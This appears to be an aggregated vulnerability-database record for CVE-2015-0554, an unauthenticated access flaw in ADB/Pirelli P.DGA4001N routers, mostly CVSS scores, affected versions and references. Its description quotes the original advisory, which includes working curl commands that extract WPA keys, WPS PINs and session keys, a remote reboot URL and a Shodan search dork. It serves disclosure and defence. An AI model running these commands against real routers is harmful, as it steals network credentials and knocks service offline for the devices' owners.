ID

VAR-201501-0227


CVE

CVE-2015-0554


TITLE

ADB P.DGA4001N Vulnerability in obtaining important information in router firmware

Trust: 0.8

sources: JVNDB: JVNDB-2015-001212

DESCRIPTION

The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface. Successful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. ADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected. - Title: CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar - Author: Eduardo Novella @enovella_ ednolo[@]inf.upv[dot]es - Version: Tested on firmware version PDG_TEF_SP_4.06L.6 - Shodan dork : + "Dropbear 0.46 country:es" ( From now on it looks like not working on this way) - Summary: HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information. - The vulnerability and the way to exploit it: $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_" <option value='0'>WLAN_DEAD</option> $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey" var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD'; $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin" var WscDevPin = '12820078'; $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey" var sessionKey='1189641421'; $ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3 <td width="50">BSSID:</td> <td> DC:0B:1A:XX:XX:XX </td> # Rebooting the router remotely and provoking a Denial of Service #----------------------------------------------------------------- http://${IP_ADDRESS}/resetrouter.html We can observe at the source: <!-- hide var sessionKey='846930886'; function btnReset() { var loc = 'rebootinfo.cgi?'; loc += 'sessionKey=' + sessionKey; var code = 'location="' + loc + '"'; eval(code); } // done hiding --> http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123 # All the information what we can fetch from. #---------------------------------------------- webs$ ls adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html certadd.html footer.html logo.html routeadd.html stylemain.css certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html colors.css hlppppoeconn.html natcfg2.html scripts util.js config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html css hlptstdns.html omcidownload.html seclogintro.html wancfg.html ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html diag.html images pppoe.html statsadslerr.html wlsecurity.html diagipow.html index.html pradd.html statsadsl.html wlsetup.html diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html diagpppoa.html ippcfg.html pwrmngt.html statsatm.html + Conclusion: This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or even worse being a member of a botnet without knowledge of it. First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them. + References: http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html + Timeline: 2013-04-xx Send email to Movistar and Pirelli 2015-01-05 Full disclosure

Trust: 2.7

sources: NVD: CVE-2015-0554 // JVNDB: JVNDB-2015-001212 // CNVD: CNVD-2015-00657 // BID: 72705 // VULHUB: VHN-78500 // VULMON: CVE-2015-0554 // PACKETSTORM: 129828

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2015-00657

AFFECTED PRODUCTS

vendor:adbmodel:p.dga4001nscope:eqversion:pdg_tef_sp_4.06l.6

Trust: 1.6

vendor:adb samodel:p.dga4001nscope: - version: -

Trust: 0.8

vendor:adb samodel:p.dga4001nscope:eqversion:pdg_tef_sp_4.06l.6

Trust: 0.8

vendor:adbmodel:p.dga4001n router pdg tef sp 4.06l.6scope: - version: -

Trust: 0.6

vendor:adbmodel:p.dga4001n pdg tef sp 4.06l.6scope: - version: -

Trust: 0.3

sources: CNVD: CNVD-2015-00657 // BID: 72705 // JVNDB: JVNDB-2015-001212 // CNNVD: CNNVD-201501-529 // NVD: CVE-2015-0554

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-0554
value: HIGH

Trust: 1.0

NVD: CVE-2015-0554
value: HIGH

Trust: 0.8

CNVD: CNVD-2015-00657
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201501-529
value: CRITICAL

Trust: 0.6

VULHUB: VHN-78500
value: HIGH

Trust: 0.1

VULMON: CVE-2015-0554
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2015-0554
severity: HIGH
baseScore: 9.4
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 9.2
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2015-00657
severity: HIGH
baseScore: 9.4
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 9.2
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-78500
severity: HIGH
baseScore: 9.4
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 9.2
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2015-00657 // VULHUB: VHN-78500 // VULMON: CVE-2015-0554 // JVNDB: JVNDB-2015-001212 // CNNVD: CNNVD-201501-529 // NVD: CVE-2015-0554

PROBLEMTYPE DATA

problemtype:CWE-264

Trust: 1.9

sources: VULHUB: VHN-78500 // JVNDB: JVNDB-2015-001212 // NVD: CVE-2015-0554

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 129828 // CNNVD: CNNVD-201501-529

TYPE

permissions and access control

Trust: 0.6

sources: CNNVD: CNNVD-201501-529

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-001212

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-78500 // VULMON: CVE-2015-0554

PATCH

title:Top Pageurl:http://broadband.adbglobal.com/

Trust: 0.8

title:Kenzer Templates [5170] [DEPRECATED]url:https://github.com/ARPSyndicate/kenzer-templates

Trust: 0.1

sources: VULMON: CVE-2015-0554 // JVNDB: JVNDB-2015-001212

EXTERNAL IDS

db:NVDid:CVE-2015-0554

Trust: 3.6

db:PACKETSTORMid:129828

Trust: 3.3

db:EXPLOIT-DBid:35721

Trust: 2.4

db:BIDid:72705

Trust: 1.0

db:JVNDBid:JVNDB-2015-001212

Trust: 0.8

db:CNNVDid:CNNVD-201501-529

Trust: 0.7

db:EXPLOITDBid:35721

Trust: 0.6

db:CNVDid:CNVD-2015-00657

Trust: 0.6

db:VULHUBid:VHN-78500

Trust: 0.1

db:VULMONid:CVE-2015-0554

Trust: 0.1

sources: CNVD: CNVD-2015-00657 // VULHUB: VHN-78500 // VULMON: CVE-2015-0554 // BID: 72705 // JVNDB: JVNDB-2015-001212 // PACKETSTORM: 129828 // CNNVD: CNNVD-201501-529 // NVD: CVE-2015-0554

REFERENCES

url:http://packetstormsecurity.com/files/129828/pirelli-adsl2-2-wireless-router-p.dga4001n-information-disclosure.html

Trust: 3.3

url:http://www.exploit-db.com/exploits/35721

Trust: 2.4

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0554

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0554

Trust: 0.8

url:http://broadband.adbglobal.com/

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/264.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.exploit-db.com/exploits/35721/

Trust: 0.1

url:https://github.com/arpsyndicate/kenzer-templates

Trust: 0.1

url:http://${ip_address}/resetrouter.html

Trust: 0.1

url:http://${ip_address}/rebootinfo.cgi?sessionkey=233665123

Trust: 0.1

url:http://${ip_address}/wlsecurity.html

Trust: 0.1

url:http://packetstormsecurity.com/files/115663/alpha-networks-adsl2-2-wireless-router-asl-26555-password-disclosure.html

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-0554

Trust: 0.1

url:http://${ip_address}/wlcfg.html

Trust: 0.1

sources: CNVD: CNVD-2015-00657 // VULHUB: VHN-78500 // VULMON: CVE-2015-0554 // BID: 72705 // JVNDB: JVNDB-2015-001212 // PACKETSTORM: 129828 // CNNVD: CNNVD-201501-529 // NVD: CVE-2015-0554

CREDITS

The vendor reported these issues.

Trust: 0.3

sources: BID: 72705

SOURCES

db:CNVDid:CNVD-2015-00657
db:VULHUBid:VHN-78500
db:VULMONid:CVE-2015-0554
db:BIDid:72705
db:JVNDBid:JVNDB-2015-001212
db:PACKETSTORMid:129828
db:CNNVDid:CNNVD-201501-529
db:NVDid:CVE-2015-0554

LAST UPDATE DATE

2025-04-13T23:14:36.209000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2015-00657date:2015-01-27T00:00:00
db:VULHUBid:VHN-78500date:2015-01-23T00:00:00
db:VULMONid:CVE-2015-0554date:2015-01-23T00:00:00
db:BIDid:72705date:2015-02-21T00:00:00
db:JVNDBid:JVNDB-2015-001212date:2015-01-27T00:00:00
db:CNNVDid:CNNVD-201501-529date:2015-01-22T00:00:00
db:NVDid:CVE-2015-0554date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:CNVDid:CNVD-2015-00657date:2015-01-27T00:00:00
db:VULHUBid:VHN-78500date:2015-01-21T00:00:00
db:VULMONid:CVE-2015-0554date:2015-01-21T00:00:00
db:BIDid:72705date:2015-02-21T00:00:00
db:JVNDBid:JVNDB-2015-001212date:2015-01-27T00:00:00
db:PACKETSTORMid:129828date:2015-01-06T23:51:58
db:CNNVDid:CNNVD-201501-529date:2015-01-22T00:00:00
db:NVDid:CVE-2015-0554date:2015-01-21T18:59:50.917